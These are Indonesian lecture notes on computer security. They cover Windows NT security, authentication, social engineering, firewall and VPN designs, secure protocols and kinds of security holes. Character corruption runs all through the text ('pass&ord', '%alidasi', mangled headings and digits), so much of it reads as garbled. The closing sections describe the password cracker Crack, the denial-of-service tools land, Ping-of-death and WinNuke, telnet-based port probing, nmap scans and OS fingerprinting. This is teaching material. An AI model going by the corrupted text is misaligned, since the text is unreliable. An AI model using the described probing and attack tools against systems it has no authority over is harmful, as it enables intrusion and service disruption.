simultan kedua media penyimpanan yang secara fisik terpisah. ;. /isk stripping dengan Parity (?$)/ 4) ' data ditulis dalam strip!strip le&at satu array disk yang didalam strip!strip tersebut terdapat informasi parity yang dapat digunakan untuk meregenerasi data apabila salah satu disk de%ice dalam strip set mengalami kegagalan. 3al ' 67

Keamanan Komputer
5* Model Keamanan ;!ndoEs NT /ibuat dari beberapa komponen yang bekerja secara bersama!sama untuk memberikan keamanan logon dan access control list ($"+) dalam ,- ' L(A 'Lo,al se,ur!t& Aut"or!t&9 ' menjamin user memiliki hak untuk mengakses system. )nti keamanan yang menciptakan akses token, mengadministrasi kebijakan keamanan local dan memberikan layanan otentikasi user. Proses logon ' menerima permintaan logon dari user (logon interaktif dan logon remote), menanti masukan username dan pass&ord yang benar. /ibantu oleh ,etlogon ser%ice. (e,ur!t& A,,ount Mana er '(AM9 ' dikenal juga sebagai directory ser%ice database, yang memelihara database untuk account user dan memberikan layan %alidasi untuk proses +1$. (e,ur!t& Re%eren,e Mon!tor '(RM9 ' memeriksa status iCin user dalam mengakses, dan hak user untuk memanipulasi obyek serta membuat pesan!pesan audit.

6* Keamanan (umber da&a lo#al Abyek dalam ,- 2file, folder (directory), proses, thread, share dan de%ice9, masing!masing akan dilengkapi dengan Ob&e# (e,ur!t& Des,r!ptor yang terdiri dari ' 1ecurity )/ A&ner ' menunjukkan user#grup yang memiliki obyek tersebut, yang memiliki kekuasaan untuk mengubah akses permission terhadap obyek tersebut. 1ecurity )/ group ' digunakan oleh subsistem PA1)P saja. /iscretionary $"+ ($ccess "ontrol +ist) ' identifikasi user dan grup yang diperbolehkan # ditolak dalam mengakses, dikendalikan oleh pemilik obyek. 1ystem $"+ ' mengendalikan pesan auditing yang dibangkitkan oleh system, dikendalikan oleh administrator keamanan jaringan. 7* Keamanan 1ar!n an 1en!s Keamanan 1ar!n an ;!ndoEs NT : Model keamanan user le%el ' account user akan mendapatkan akses untuk pemakaian bersama dengan menciptakan share atas directory atau printer. o 0eunggulan ' kemampuan untuk memberikan user tertentu akses ke sumberdaya yang di!share dan menentukan jenis akses apa yang diberikan. o 0elemahan ' proses setup yang kompleks karena administrator harus memberitahu setiap user dan menjaga policy system keamanan tetap dapat diba&ah kendalinya dengan baik. Model keamanan 1hare le%el ' dikaitkan dengan jaringan peer to peer, dimana user manapun membagi sumber daya dan memutuskan apakaha diperlukan pass&ord untuk suatu akses tertentu. o 0euntungan ' kesederhanaannya yang membuat keamanan share!le%el tidak membutuhkan account user untuk mendapatkan akses. o 0elemahan ' sekali iCin akses # pass&ord diberikan, tidak ada kendali atas siap yang menakses sumber daya.

Cara NT menan an! #eamanan jar!n an : 6. Memberikan permission ' Permission ,-F1 local Permission shere ;. 0eamanan ?$1 (?emote $ccess 1er%er) Melakukan remote access user menggunakan dial!up ' Atentikasi user name dan pass&ord yang %alid dengan dial!in permission. "allback security ' pengecekan nomor telepon yang %alid. $uditing ' menggunakan auditing trails untuk melacak ke#dari siapa, kapan user memiliki akses ke ser%er dan sumberdaya apa yang diakses. <. Pengamanan +ayanan internet ' Fire&all terbatas pada )nternet )nformation ser%er ())1). Menginstal tambahan proKy seperti Microsoft ProKy ser%er. =. 1hare administrati%e 'memungkin administrator mendapatkan akses ke ser%er &indo&s ,- atau &orkstation melalui jaringan 3al ' ;G

Keamanan Komputer
8* Keamanan pada pr!nter /ilakukan dengan mensetting properties printer ' 6. Menentukan permission ' full control, Manage document, print ;. Biasanya susunan permission pada ,- defaulut ' $dminstrator V full control A&ner V Manage document 1emua user V print <. Mengontrol print job, terdiri dari ' 1etting &aktu cetak Prioritas ,otifikasi (orang yang perlu diberi peringatan) =. 1et auditing information =* Keamanan Re !str& -ools yang disediakan dalam pengaksesan registry ' 1ystem policy editor ' mengontrol akses terhadap registry editor, memungkinkan administrator mengedit dan memodifikasi %alue tertentu dalam registry dengan berbasis grafis. ?egistry editor (regedit<;.eKe) ' tools untuk melakukan edit dan modifikasi %alue dalam registry. :indo&s ,- /iagnostics (&inmsd.eKe) ' memungkinkan user melihat setting isi registry dan %aluenya tanpa harus masuk ke registry editor sendiri. Tools ba,#up untu# re !str& &a!tu : ?egback.eKe memanfaatkan command line # remote session untuk membackupr registry. ntbackup.eKe ' otomatisasi backup 3$,>$ pada -ape dri%e, termasuk sebuah kopi dari file backup registry local. .mergency ?epair /isk (rdisk.eKe) ' memback!up hi%e system dan soft&are dalam registry. >* Aud!t dan Pen,atatan Lo Pencatatan logon dan logoff termasuk pencatatan dalam multi entry login Abject access (pencatatan akses obyek dan file) Pri%ilege 5se (paencatatan pemakaian hak user) $ccount Management (manajemen user dan group) Policy change (Pencatatan perubahan kebijakan keamanan) 1ystem e%ent (pencatatan proses restart, shutdo&n dan pesan system) /etailed tracking (pencatatan proses dalam system secara detail)

KEAMANAN 1ARIN2AN )* Membatas! A#ses #e 1ar!n an A* Membuat t!n #atan a#ses : Pembatasan!pembatasan dapat dilakukan sehingga memperkecil peluang penembusan oleh pemakai yang tak diotorisasi, misalnya ' Pembatasan login. +ogin hanya diperbolehkan ' Pada terminal tertentu. 3anya ada &aktu dan hari tertentu. Pembatasan dengan call!back (+ogin dapat dilakukan siapapun. Bila telah sukses login, sistem segera memutuskan koneksi dan memanggil nomor telepon yang telah disepakati, Penyusup tidak dapat menghubungi le&at sembarang saluran telepon, tapi hanya pada saluran telepon tertentu). Pembatasan jumlah usaha login. +ogin dibatasi sampai tiga kali dan segera dikunci dan diberitahu ke administrator. 1emua login direkam dan sistem operasi melaporkan informasi!informasi berikut ' :aktu, yaitu &aktu pemakai login. -erminal, yaitu terminal dimana pemakai login. -ingkat akses yang diiCinkan ( read # &rite # eKecute # all ) 3al ' ;6

Keamanan Komputer
0* Me#an!sme #endal! a#ses : Masalah identifikasi pemakai ketika login disebut otentifikasi pemakai (user authentication). 0ebanyakan metode otentifikasi didasarkan pada tiga cara, yaitu ' 6. 1esuatu yang diketahui pemakai, misalnya ' Pass&ord. 0ombinasi kunci. ,ama kecil ibu mertua. /an sebagainya. ;. 1esuatu yang dimiliki pemakai, misalnya ' Badge. 0artu identitas. 0unci. /an sebagainya. <. 1esuatu mengenai (ciri) pemakai, misalnya ' 1idik jari. 1idik suara. Foto. -anda tangan. C* ;aspada ter"adap Re#a&asa sos!al : 6. Mengaku sebagi eksekutif yang tidak berhasil mengakses, menghubungi administrator %ia telepon#faK. ;. Mengaku sebagai administrator yang perlu mendiagnosa masalah net&ork, menghubungi end user %ia email#faK#surat. <. Mengaku sebagai petugas keamanan e!commerce, menghubungi customer yang telah bertransaksi untuk mengulang kembali transaksinya di form yang disediakan olehnya. =. pencurian surat, pass&ord. 4. penyuapan, kekerasan. D* Membeda#an (umber da&a !nternal dan E#sternal : Memanfaatkan teknologi fire&all yang memisahkan net&ork internal dengan net&ork eksternal dengan rule tertentu. E* (!stem Otent!#as! User : De% : adalah proses penentuan identitas dari seseorang yang sebenarnya, hal ini diperlukan untuk menjaga keutuhan ( integrity ) dan keamanan ( security ) data, pada proses ini seseorang harus dibuktikan siapa dirinya sebelum menggunakan layanan akses. Upa&a untu# leb!" men aman#an prote#s! passEordG antara la!n : 6. 1alting. Menambahkan string pendek ke string pass&ord yang diberikan pemakai sehingga mencapai panjang pass&ord tertentu. ;. Ane time pass&ord. Pemakai harus mengganti pass&ord secara teratur. 5paya ini membatasi peluang pass&ord telah diketahui atau dicoba!coba pemakai lain. Bentuk ekstrim pendekatan ini adalah one time pass&ord, yaitu pemakai mendapat satu buku berisi daftar pass&ord. 1etiap kali pemakai login, pemakai menggunakan pass&ord berikutnya yang terdapat di daftar pass&ord. /engan one time pass&ord, pemakai direpotkan keharusan menjaga agar buku pass&ordnya jangan sampai dicuri. <. 1atu daftar panjang pertanyaan dan ja&aban. Mariasi terhadap pass&ord adalah mengharuskan pemakai memberi satu daftar pertanyaan panjang dan ja&abannya. Pertanyaan!pertanyaan dan ja&abannya dipilih pemakai sehingga pemakai mudah mengingatnya dan tak perlu menuliskan di kertas. Pertanyaan berikut dapat dipakai, misalnya ' 1iapa mertua abang ipar Badru L $pa yang diajarkan Pak 3arun &aktu 1/ L /i jalan apa pertama kali ditemukan simanis L Pada saat login, komputer memilih salah satu dari pertanyaan!pertanyaan secara acak, menanyakan ke pemakai dan memeriksa ja&aban yang diberikan. =. -antangan tanggapan (chalenge response). Pemakai diberi kebebasan memilih suatu algoritma, misalnya K<. 3al ' ;;

Keamanan Komputer
0etika pemakai login, komputer menuliskan di layar angka <. /alam kasus ini pemakai mengetik angka ;8. $lgoritma dapat berbeda di pagi, sore, dan hari berbeda, dari terminal berbeda, dan seterusnya.

Conto" Produ# Otent!#as! UserG antara la!n : 6. 1ecureid $". ($ccess "ontrol .ncryption) 1ystem token hard&are seperti kartu kredit berdisplay, pemakai akan menginput nomor pin yang diketahui bersama, lalu memasukkan pascode bah&a dia pemilik token. 1#key (Bellcore) 1ystem soft&are yang membentuk one time pass&ord (A-P) berdasarkan informasi loginterkhir dengan aturan random tertentu. Pass&ord $uthentication Protocol (P$P) Protokol dua arah untuk PPP (Point to point Protocol). Peer mengirim pasangan user id dan pass&ord, authenticator menyetujuinya. "hallenge 3andshake $uthentication Protocol ("3$P) 1#key pada P$P, protocol < arah, authenticator mengirim pesan tantangan ke peer, peer menghitung nilai lalu mengirimkan ke authenticator, authenticator menyetujui otentikasi jika ja&abannya sama dengan nilai tadi. ?emote $uthentication /ial!in 5ser 1er%ice (?$/)51) 5ntuk hubungan dial!up, menggunakan net&ork access ser%er, dari suatu host yang menjadi client ?$/)51, merupan system satu titik akses. -erminal $ccess "ontroller $ccess "ontrol 1ystem (-$"$"1) Protokol keamanan berbasis ser%er dari ")1"A 1ystem. 1ecuryXity 1er%er terpusat dangan file pass&ord 5,)P, database otentikasi, otorisasi dan akunting, fungsi digest (transmisi pass&ord yang tidak polos)

;.

<.

=.

4.

B.

4* Mel!ndun ! Aset Or an!sas! A*(e,ara Adm!ns!strat!% - %!s!# ?encana kemungkinan terhadap bencana Program penyaringan calon pega&ai system informasi Program pelatihan user 0ebijakan akses net&ork 0* (e,ara Te#n!s 0*)* Penerapan 3!reEall Ist!la" pada penerapan 3!reEall 3ost 1uatu sistem komputer yang terhubung pada suatu net&ork Bastion host 1istem komputer yang harus memiliki tingkat sekuritas yang tinggi karena sistem ini ra&an sekali terhadap serangan hacker dan cracker, karena biasanya mesin ini diekspos ke net&ork luar ()nternet) dan merupakan titik kontak utama para user dari internal net&ork. Packet Filtering $ksi dari suatu de%ais untuk mengatur secara selektif alur data yang melintasi suatu net&ork. Packet filter dapat memblok atau memperbolehkan suatu paket data yang melintasi net&ork tersebut sesuai dengan kebijaksanaan alur data yang digunakan (security policy). Perimeter net&ork 1uatu net&ork tambahan yang terdapat di antara net&ork yang dilindungi dengan net&ork eksternal, untuk menyediakan layer tambahan dari suatu sistem security. Perimeter net&ork juga sering disebut dengan /M\ (/e!MillitariCed \one). Keuntun an 3!reEall : Fire&all merupakan fokus dari segala keputusan sekuritas. 3al ini disebabkan karena Fire&all merupakan satu titik tempat keluar masuknya trafik internet pada suatu jaringan. Fire&all dapat menerapkan suatu kebijaksanaan sekuritas. Banyak sekali ser%ice!ser%ice yang digunakan di )nternet. -idak semua ser%ice tersebut aman digunakan, oleh karenanya Fire&all dapat berfungsi sebagai penjaga untuk menga&asi ser%ice!ser%ice mana yang dapat digunakan untuk menuju dan meninggalkan suatu net&ork. 3al ' ;<

Keamanan Komputer
Fire&all dapat mencatat segala akti%itas yang berkaitan dengan alur data secara efisien. 1emua trafik yang melalui Fire&all dapat diamati dan dicatat segala akti%itas yang berkenaan dengan alur data tersebut. /engan demikian ,et&ork $dministrator dapat segera mengetahui jika terdapat akti%itas!akti%itas yang berusaha untuk menyerang internal net&ork mereka. Fire&all dapat digunakan untuk membatasi pengunaan sumberdaya informasi. Mesin yang menggunakan Fire&all merupakan mesin yang terhubung pada beberapa net&ork yang berbeda, sehingga kita dapat membatasi net&ork mana saja yang dapat mengakses suatu ser%ice yang terdapat pada net&ork lainnya.

Kelema"an 3!reEall : Fire&all tidak dapat melindungi net&ork dari serangan koneksi yang tidak mele&atinya (terdapat pintu lain menuju net&ork tersebut). Fire&all tidak dapat melindungi dari serangan dengan metoda baru yang belum dikenal oleh Fire&all. Fire&all tidak dapat melindungi dari serangan %irus. P!l!"an #las!%!#as! desa!n 3!reEall : 6. Packet Filtering 1istem paket filterin/ atau sering juga disebut dengan screenin/ router adalah router yang melakukan routing paket antara internal dan eksternal net'or" secara selektif sesuai dengan security policy yang digunakan pada net'or" tersebut. )nformasi yang digunakan untuk menyeleksi paket!paket tersebut adalah' )P address asal )P address tujuan Protocol (-"P, 5/P, atau )"MP) Port -"P atau 5/P asal Port -"P atau 5/P tujuan Beberapa contoh routing paket selektif yang dilakukan oleh Screenin/ ,outer ' 1emua koneksi dari luar sistem yang menuju internal net'or" diblokade kecuali untuk koneksi 1M-P Memperbolehkan ser ice email dan F-P, tetapi memblok ser ice!ser ice berbahaya seperti -F-P, P :indo&, ?P" dan r ser ice (rlogin, rsh, rcp, dan lain!lain). 1elain memiliki keuntungan tertentu di antaranya aplikasi screenin/ router ini dapat bersifat transparan dan implementasinya relatif lebih murah dibandingkan metode fire'all yang lain, sistem paket filterin/ ini memiliki beberapa kekurangan yakni ' tingkat securitynya masih rendah, masih memungkinkan adanya )P 1poofing, tidak ada screenin/ pada layer!layer di atas net'or" layer. ;. $pplication +e%el @ate&ay (ProKy 1er%ices) #ro8y ser ice merupakan aplikasi spesifik atau program ser%er yang dijalankan pada mesin !ire'all, program ini mengambil user re.uest untuk )nternet ser ice (seperti F-P, telnet, 3--P) dan meneruskannya (bergantung pada security policy) ke host yang dituju* /engan kata lain adalah pro8y merupakan perantara antara internal net'or" dengan eksternal net'or" ()nternet). Pada sisi ekternal hanya dikenal mesin pro8y tersebut, sedangkan mesin!mesin yang berada di balik mesin pro8y tersebut tidak terlihat. $kibatnya sistem pro8y ini kurang transparan terhadap user yang ada di dalam 1istem #ro8y ini efektif hanya jika pada konjungsi antara internal dan eksternal net'or" terdapat mekanisme yang tidak memperbolehkan kedua net'or" tersebut terlibat dalam komunikasi langsung. 0euntungan yang dimiliki oleh sistem pro8y ini adalah tingkat sekuritasnya lebih baik daripada screenin/ router, deteksi paket yang dilakukan sampai pada layer aplikasi. 1edangkan kekurangan dari sistem ini adalah perfomansinya lebih rendah daripada screenin/ router karena terjadi penambahan header pada paket yang dikirim, aplikasi yang di!support oleh pro8y ini terbatas, serta sistem ini kurang transparan. Ars!te#tur dasar %!reEall : $rsitektur dengan dual!homed host (kadang kadang dikenal juga sebagai dual homed /ate'ay# /3@) 1istem /3@ menggunakan sebuah komputer dengan (paling sedikit) dua net&ork!interface. )nterface pertama dihubungkan dengan jaringan internal dan yang lainnya dengan )nternet. /ual!homed host nya sendiri berfungsi sebagai bastion host (front terdepan, bagian terpenting dalam fire&all).

3al ' ;=

Keamanan Komputer

)nternet
bastion host

$rsitektur dengan dual!homed host

screened!host (screened host /ate'ay# 13@) Pada topologi 13@, fungsi fire&all dilakukan oleh sebuah screening!router dan bastion host. ?outer ini dikonfigurasi sedemikian sehingga akan menolak semua trafik kecuali yang ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan pembatasan. /engan cara ini setiap client ser%is pada jaringan internal dapat menggunakan fasilitas komunikasi standard dengan )nternet tanpa harus melalui proKy.

)nternet
router

bastion!host

$rsitektur dengan screened!host

screened 11@). subnet (screened subnet /ate'ay#

Fire&all dengan arsitektur screened!subnet menggunakan dua screening!router dan jaringan tengah ( perimeter net'or") antara kedua router tersebut, dimana ditempatkan bastion host. 0elebihan susunan ini akan terlihat pada &aktu optimasi penempatan ser%er.
$rsitektur dengan screened!subnet

)nternet
router eksternal router internal

0*4* NetEor#

bastion!host jaringan tengah

Penerapan :!rtual Pr!+at ':PN9

De%en!s! :PN Mirtual Pri%ate ,et&ork atau *aringan Pribadi Maya sesungguhnya sama dengan *aringan Pribadi (Pri%ate ,et&ork#P,) pada umumnya, di mana satu jaringan komputer suatu lembaga atau perusahaan di suatu daerah atau negara terhubung dengan jaringan komputer dari satu grup perusahaan yang sama di daerah atau negara lain. Perbedaannya hanyalah pada media penghubung antar jaringan. 0alau pada P,, media penghubungnya masih merupakan milik perusahaan#grup itu sendiri, dalam MP,, media penghubungnya adalah jaringan publik seperti )nternet. /alam MP,, karena media penghubung antar jaringannya adalah jaringan publik, diperlukan pengamanan dan pembatasan! pembatasan. Pengamanan diperlukan untuk menjaga agar tidak sebarang orang dari jaringan publik dapat masuk ke jaringan pribadi. >ang dikecualikan hanyalah orang!orang yang terdaftar atau terotentifikasi terlebih dahulu yang dapat masuk ke jaringan pribadi. Pembatasan diperlukan untuk menjaga agar tidak semua orang atau user dari jaringan pribadi dapat mengakses jaringan publik (internet). Cara membentu# :PN )* Tunnell!n 3al ' ;4

Keamanan Komputer
1esuai dengan arti tunnel atau lorong, dalam membentuk suatu MP, ini dibuat suatu tunnel di dalam jaringan publik untuk menghubungkan antara jaringan yang satu dan jaringan lain dari suatu grup atau perusahaan.yang ingin membangun MP, tersebut. 1eluruh komunikasi data antarjaringan pribadi akan melalui tunnel ini, sehingga orang atau user dari jaringan publik yang tidak memiliki iCin untuk masuk tidak akan mampu untuk menyadap, mengacak atau mencuri data yang melintasi tunnel ini. $da beberapa metode tunelling yang umum dipakai, di antaranya' ! )PP -o )P -unnelling, atau ! PPP -o )P -unnelling )PP -o )P tunnelling biasa digunakan dalam jaringan MP, ,o%ell ,et&are. *adi dua jaringan ,o%ell yang terpisah akan tetap dapat saling melakukan komunikasi data melalui jaringan publik )nternet melalui tunnel ini tanpa kuatir akan adanya gangguan pihak ke!< yang ingin mengganggu atau mencuri data. Pada )PP -o )P tunnelling, paket data dengan protokol )PP (standar protokol ,o%ell) akan dibungkus (encapsulated) terlebih dahulu oleh protokol )P (standar protokol )nternet) sehingga dapat melalui tunnel ini pada jaringan publik )nternet. 1ama halnya untuk PPP -o )P tunnelling, di mana PPP protokol diencapsulated oleh )P protokol. 1aat ini beberapa %endor hard&are router seperti "isco, 1hi%a, Bay ,et&orks sudah menambahkan kemampuan MP, dengan teknologi tunnelling pada hard&are mereka. 4* 3!reEall 1ebagaimana layaknya suatu dinding, Fire&all akan bertindak sebagai pelindung atau pembatas terhadap orang!orang yang tidak berhak untuk mengakses jaringan kita. 5mumnya dua jaringan yang terpisah yang menggunakan Fire&all yang sejenis, atau seorang remote user yang terhubung ke jaringan dengan menggunakan soft&are client yang terenkripsi akan membentuk suatu MP,, meskipun media penghubung dari kedua jaringan tersebut atau penghubung antara remote user dengan jaringan tersebut adalah jaringan publik seperti )nternet. 1uatu jaringan yang terhubung ke )nternet pasti memiliki )P address (alamat )nternet) khusus untuk masing!masing komputer yang terhubung dalam jaringan tersebut. $pabila jaringan ini tidak terlindungi oleh tunnel atau fire&all, )P address tadi akan dengan mudahnya dikenali atau dilacak oleh pihak!pihak yang tidak diinginkan. $kibatnya data yang terdapat dalam komputer yang terhubung ke jaringan tadi akan dapat dicuri atau diubah. /engan adanya pelindung seperti fire&all, kita bisa menyembunyikan (hide) address tadi sehingga tidak dapat dilacak oleh pihak!pihak yang tidak diinginkan. Kemampuan %!reEall dalam penerapann&a pada :PN o )P 3iding#Mapping. 0emampuan ini mengakibatkan )P address dalam jaringan dipetakan atau ditranslasikan ke suatu )P address baru. /engan demikian )P address dalam jaringan tidak akan dikenali di )nternet. o Pri%ilege +imitation. /engan kemampuan ini kita dapat membatasi para user dalam jaringan sesuai dengan otorisasi atau hak yang diberikan kepadanya. Misalnya, 5ser $ hanya boleh mengakses home page, user B boleh mengakses home page, e!mail dan ne&s, sedangkan user " hanya boleh mengakses e!mail. Autside +imitation. /engan kemampuan ini kita dapat membatasi para user dalam jaringan untuk hanya mengakses ke alamat!alamat tertentu di )nternet di luar dari jaringan kita. )nside +imitation. 0adang!kadang kita masih memperbolehkan orang luar untuk mengakses informasi yang tersedia dalam salah satu komputer (misalnya :eb 1er%er) dalam jaringan kita. 1elain itu, tidak diperbolehkan, atau memang sama sekali tidak diCinkan untuk mengakses seluruh komputer yang terhubung ke jaringan kita. Pass&ord and .ncrypted $uthentication. Beberapa user di luar jaringan memang diiCinkan untuk masuk ke jaringan kita untuk mengakses data dan sebagainya, dengan terlebih dahulu harus memasukkan pass&ord khusus yang sudah terenkripsi.

o o

5* Men aman#an saluran terbu#a Protokol -"P#)P merupakan protocol dalam set standar yang terbuka dalam pengiriman data, untuk itulah perlu dilakukan enkripsi dalam rangka penanganan keamanan data yang diterapkan pada protocol tersebut, yang meliputi ' A* Keamanan Panda lap!san Apl!#as! 1.- (1ecure .lectronics -ransaction) o Menentukan bagaimana transaksi mengalir antara pemakai, pedagang dan bank. o Menentukan fungsi keamanan ' digital signature, hash dan enkripsi. o Produk dari Mastercard dan M)1$ )nternational. 1ecure 3--P o Produk dari &orkgroup ).-F, diimplementasikan pada &ebser%er mulai 6774. 3al ' ;B

Keamanan Komputer
o Menentukan mekanisme kriptografi standar untuk mengenkripsikan pengiriman data http

Pretty @ood Pri%acy (P@P) o 1tandarisasi ?F" 6776 o Membuat dan memastikan digital signature, mengenkripsi V deskripsi dan mengkompresi data. 1ecure M)M. (1#M)M.) o 1tandarisasi ?F" 64;6 o M)M. (Multipurpose )nternet Mail .Ktension) o Menentukan cara menempelkan file untuk dikirim ke internet dengan menggunakan metode hirarki dalm pendefenisian user remi dan sertfikat digitalnya. "ybercash o 1tandarisasi ?F" 6J7J o Memproses kartu kredit di internet dengan mengenkripsi dan menandatangani transaksi secara digital.

0* Keamanan dalam Lap!san Transport 11+ (1ecure 1ocket +ayer) o Produk ,etscape o Protocol yang menegoisasikan hubungan yang aman antara client dan ser%er, dengan menggunakan kunci enkripsi =G!bit. C* Keamanan dalam Lap!san NetEor# )P security Protocol ' melindungi protocol client )P pada net&ork layer. )P $uthentication header )P .ncapsulating 1ecurity protocol 1imple!key management for )nternet protocol (10)P) )nternet security $ssociation and key management protocol ()1$0MP) )nternet key management protocol ()0MP) 1umber ' &&&.ietf.org

E:ALUA(I KEAMANAN (I(TEM IN3ORMA(I (E0A0 MA(ALAH KEAMANAN HARU( (ELALU DIMONITOR : /itemukannya lubang keamanan (security hole) yang baru. Perangkat lunak dan perangkat keras biasanya sangat kompleks sehingga tidak mungkin untuk diuji seratus persen. 0adang!kadang ada lubang keamanan yang ditimbulkan oleh kecerobohan implementasi. 0esalahan konfigurasi. 0adang!kadang karena lalai atau alpa, konfigurasi sebuah sistem kurang benar sehingga menimbulkan lubang keamanan. Misalnya mode (permission atau kepemilikan) dari berkas yang menyimpan pass&ord (#etc#pass&d di sistem 5,)P) secara tidak sengaja diubah sehingga dapat diubah atau ditulis oleh orang!orang yang tidak berhak. Penambahan perangkat baru (hard&are dan#atau soft&are) yang menyebabkan menurunnya tingkat security atau berubahnya metoda untuk mengoperasikan sistem. Aperator dan administrator harus belajar lagi. /alam masa belajar ini banyak hal yang jauh dari sempurna, misalnya ser%er atau soft&are masih menggunakan konfigurasi a&al dari %endor (dengan pass&ord yang sama).

(UM0ER LU0AN2 KEAMANAN )* (ala" D!sa!n 'des! n %laE9 5mumnya jarang terjadi. $kan tetapi apabila terjadi sangat sulit untuk diperbaiki. $kibat disain yang salah, maka biarpun dia diimplementasikan dengan baik, kelemahan dari sistem akan tetap ada. "ontoh ' +emah disainnya algoritma enkripsi ?A-6< atau "aesar cipher, dimana karakter digeser 6< huruf atau < huruf. Meskipun diimplementasikan dengan programming yang sangat teliti, siapapun yang mengetahui algoritmanya dapat memecahkan enkripsi tersebut. 3al ' ;8

Keamanan Komputer
0esalahan disain urutan nomor (seauence numbering) dari paket -"P#)P. 0esalahan ini dapat dieksploitasi sehingga timbul masalah yang dikenal dengan nama E)P spoofing( (sebuah host memalsukan diri seolah!olah menjadi host lain dengan membuat paket palsu setelah engamati urutan paket dari host yang hendak diserang). 4* Implementas! #uran ba!# Banyak program yang diimplementasikan secara terburu!buru sehingga kurang cermat dalam pengkodean. $kibat tidak adanya cek atau testing implementasi suatu program yang baru dibuat. "ontoh' -idak memperhatikan batas (Ebound() dari sebuah Earray( tidak dicek sehingga terjadi yang disebut out!of!bound array atau buffer o%erflo& yang dapat dieksploitasi (misalnya o%er&rite ke %ariable berikutnya). 0ealpaan memfilter karakter!karakter yang aneh!aneh yang dimasukkan sebagai input dari sebuah program sehingga sang program dapat mengakses berkas atau informasi yang semestinya tidak boleh diakses. 5* (ala" #on%! uras! "ontoh ' Berkas yang semestinya tidak dapat diubah oleh pemakai secara tidak sengaja menjadi E&riteable(. $pabila berkas tersebut merupakan berkas yang penting, seperti berkas yang digunakan untuk menyimpan pass&ord, maka efeknya menjadi lubang keamanan. 0adangkala sebuah komputer dijual dengan konfigurasi yang sangat lemah. $danya program yang secara tidak sengaja diset menjadi Esetuid root( sehingga ketika dijalankan pemakai memiliki akses seperti super user (root) yang dapat melakukan apa saja. 6* (ala" men una#an pro ram atau s!stem "ontoh ' 0esalahan menggunakan program yang dijalankan dengan menggunakan account root (super user) dapat berakibat fatal. PEN2U1I KEAMANAN (I(TEM 5ntuk memudahkan administrator dari sistem informasi membutuhkan Eautomated tools(, perangkat pembantu otomatis, yang dapat membantu menguji atau meng!e%aluasi keamanan sistem yang dikelola. "ontoh -ools -erintegrasi' Peran #at luna# bantu "ops -rip&ire 1atan#1aint 1B1can' localhost security scanner Ballista Nhttp'##&&&.secnet.comO Dan seba/ainya9 (cari sendiri:1 "ontoh -ools Pengujian yang dibuat para hacker ' Tools "rack Ke unaan program untuk menduga atau memecahkan pass&ord dengan menggunakan sebuah atau beberapa kamus (dictionary). Program crack ini melakukan brute force cracking dengan mencoba mengenkripsikan sebuah kata yang diambil dari kamus, dan kemudian membandingkan hasil enkripsi dengan pass&ord yang ingin dipecahkan. land dan latierra sistem :indo&s 74#,- menjadi macet (hang, lock up). Program ini mengirimkan sebuah paket yang sudah di(spoofed( sehingga seolah!olah paket tersebut berasal dari mesin yang sama dengan menggunakan port yang terbuka Ping!o!death sebuah program (ping) yang dapat meng!crash!kan :indo&s 74#,- dan beberapa %ersi 5niK. :inuke program untuk memacetkan sistem berbasis :indo&s Dan seba/ainya9 (cari sendiri:1 (!stem Operas! 5,)P 5,)P 5,)P 5,)P :indo&s ,-

3al ' ;J

Keamanan Komputer
PRO0IN2 (ER:ICE( /efenisi Probing ' Eprobe( (meraba) ser%is apa saja yang tersedia. Program ini juga dapat digunakan oleh kriminal untuk melihat ser%is apa saja yang tersedia di sistem yang akan diserang dan berdasarkan data!data yang diperoleh dapat melancarkan serangan. 1er%is di )nternet umumnya dilakukan dengan menggunakan protokol -"P atau 5/P. 1etiap ser%is dijalankan dengan menggunakan port yang berbeda, misalnya' o 1M-P, untuk mengirim dan menerima e!mail, -"P, port ;4 o PAP<, untuk mengambil e!mail, -"P, port 66G "ontoh di atas hanya sebagian dari ser%is yang tersedia. /i system 5,)P, lihat berkas #etc#ser%ices dan #etc#inetd.conf untuk melihat ser%is apa saja yang dijalankan oleh ser%er atau komputer yang bersangkutan. Pemilihan ser%is apa saja tergantung kepada kebutuhan dan tingkat keamanan yang diinginkan. 1ayangnya seringkali sistem yang dibeli atau dirakit menjalankan beberapa ser%is utama sebagai Edefault(. 0adang!kadang beberapa ser%is harus dimatikan karena ada kemungkinan dapat dieksploitasi oleh cracker. 5ntuk itu ada beberapa program yang dapat digunakan untuk melakukan 5ntuk beberapa ser%is yang berbasis -"P#)P, proses probe dapat dilakukan dengan menggunakan program telnet. Misalnya untuk melihat apakah ada ser%is e!mail dengan menggunakan 1M-P digunakan telnet ke port ;4 dan port 66G. uniKH telnet target.host.com ;4 uniKH telnet localhost 66G Pro ram pen uj! prob!n 'pen uj! semua port otomat!s9 : Paket probe untuk sistem 5,)P b nmap b strobe b tcpprobe Probe untuk sistem :indo& 74#7J#,b ,et+ab b "yberkit b Agre Pro ram &an memon!tor adan&a prob!n #e s&stem Probing biasanya meninggalkan jejak di berkas log di system anda. /engan mengamati entry di dalam berkas log dapat diketahui adanya probing. 1elain itu, ada juga program untuk memonitor probe seperti paket program courtney, portsentry dan tcplogd. O( 3IN2ERPRINTIN2 Fingerprinting ' $nalisa A1 sistem yang ditujua agar dapat melihat database kelemahan sistem yang dituju. Metode Fingerprinting ' "ara yang paling kon%ensional ' o 1er%ice telnet ke ser%er yang dituju, jika ser%er tersebut kebetulan menyediakan ser%is telnet, seringkali ada banner yang menunjukkan nama A1 beserta %ersinya. o 1er%ice F-P di port ;6. /engan melakukan telnet ke port tersebut dan memberikan perintah E1>1-( anda dapat mengetahui %ersi dari A1 yang digunakan. o Melakukan finger ke :eb ser%er, dengan menggunakan program netcat (nc). "ara fingerprinting yang lebih canggih adalah dengan menganalisa respon sistem terhadap permintaan (reauest) tertentu. Misalnya dengan menganalisa nomor urut packet -"P#)P yang dikeluarkan oleh ser%er tersebut dapat dipersempit ruang jenis dari A1 yang digunakan. $da beberapa tools untuk melakukan deteksi A1 ini antara lain' o nmap o aueso

PEN22UNAAN PRO2RAM PEN/ERAN2 5ntuk mengetahui kelemahan sistem informasi adalah dengan menyerang diri sendiri dengan paket!paket program penyerang (attack) yang dapat diperoleh di )nternet. 3al ' ;7

Keamanan Komputer
